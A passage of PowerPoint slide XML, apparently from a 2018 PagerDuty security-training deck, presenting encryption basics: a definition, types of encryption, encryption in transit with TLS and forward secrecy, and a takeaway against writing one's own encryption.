              <a:t>https://en.wikipedia.org/wiki/PBKDF2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1042" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104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044" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1046" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>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50" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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05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052" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Encryption"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1055" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10101237" y="2000794"/>
            <a:ext cx="12952551" cy="9714412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>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warning-sign.jpg" descr="warning-sign.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="80000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233" y="-762000"/>
            <a:ext cx="24384001" cy="15240000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="265"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266"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67" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268"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59" name="encrypting_data.jpg" descr="encrypting_data.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24384000" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Encoding information in such a way that only authorized parties can read it."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="420623">
              <a:defRPr sz="10304"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encoding information in such a way that only authorized parties can read it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1061"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1062"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063" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1064" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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DEFINITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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69" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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070"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071" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="https://xkcd.com/257/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://xkcd.com/257/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1074" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1075" name="xkcd-257.png" descr="xkcd-257.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5728053" y="1716907"/>
            <a:ext cx="12927894" cy="10282186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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79"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080"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081" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Never write your own encryption."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Never write your own encryption.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Unless you’re an expert at it, and it’s your job or something."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6108104" y="7663129"/>
            <a:ext cx="12167792" cy="688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600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Unless you’re an expert at it, and it’s your job or something.</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9" name="Encryption Types"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Symmetric/Asymmetric…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Symmetric/Asymmetric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Block Cipher (w/CBC, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Public/Private Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Stream Cipher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>… about a billion others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1091"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092"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093" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094"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fast"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8" name="Encryption Types"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Symmetric/Asymmetric Key to encrypt/decrypt is same or not.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Symmetric/Asymmetric</a:t>
            </a:r>
            <a:r>
              <a:t> Key to encrypt/decrypt is same or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block Cipher (w/CBC, etc)</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>Data encrypted in chunks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Public/Private Key</a:t>
            </a:r>
            <a:r>
              <a:t> You have private, everyone has public.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stream Cipher</a:t>
            </a:r>
            <a:r>
              <a:t> Encrypted “on-the-fly” rather than in chunks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>… about a billion others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1100"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10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102" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103"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07" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="25000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2580207" y="-80368"/>
            <a:ext cx="27753469" cy="13876736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1108"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110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110" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Encryption in Transit"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="457200"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption in Transit</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6" name="Encryption in Transit"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption in Transit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1117" name="What do we want? Intercepted communications cannot be read, now or in future.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What do we want?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Intercepted communications cannot be read, now or in future.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How do we do it?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>HTTPS, TLS, IPsec, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anything else?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Be sure to use Perfect Forward Secrecy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1118"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11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120" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121"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25" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="25000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26225" y="-3796587"/>
            <a:ext cx="24436450" cy="18565974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1126"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1127"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128" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130" name="Encryption at Rest"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
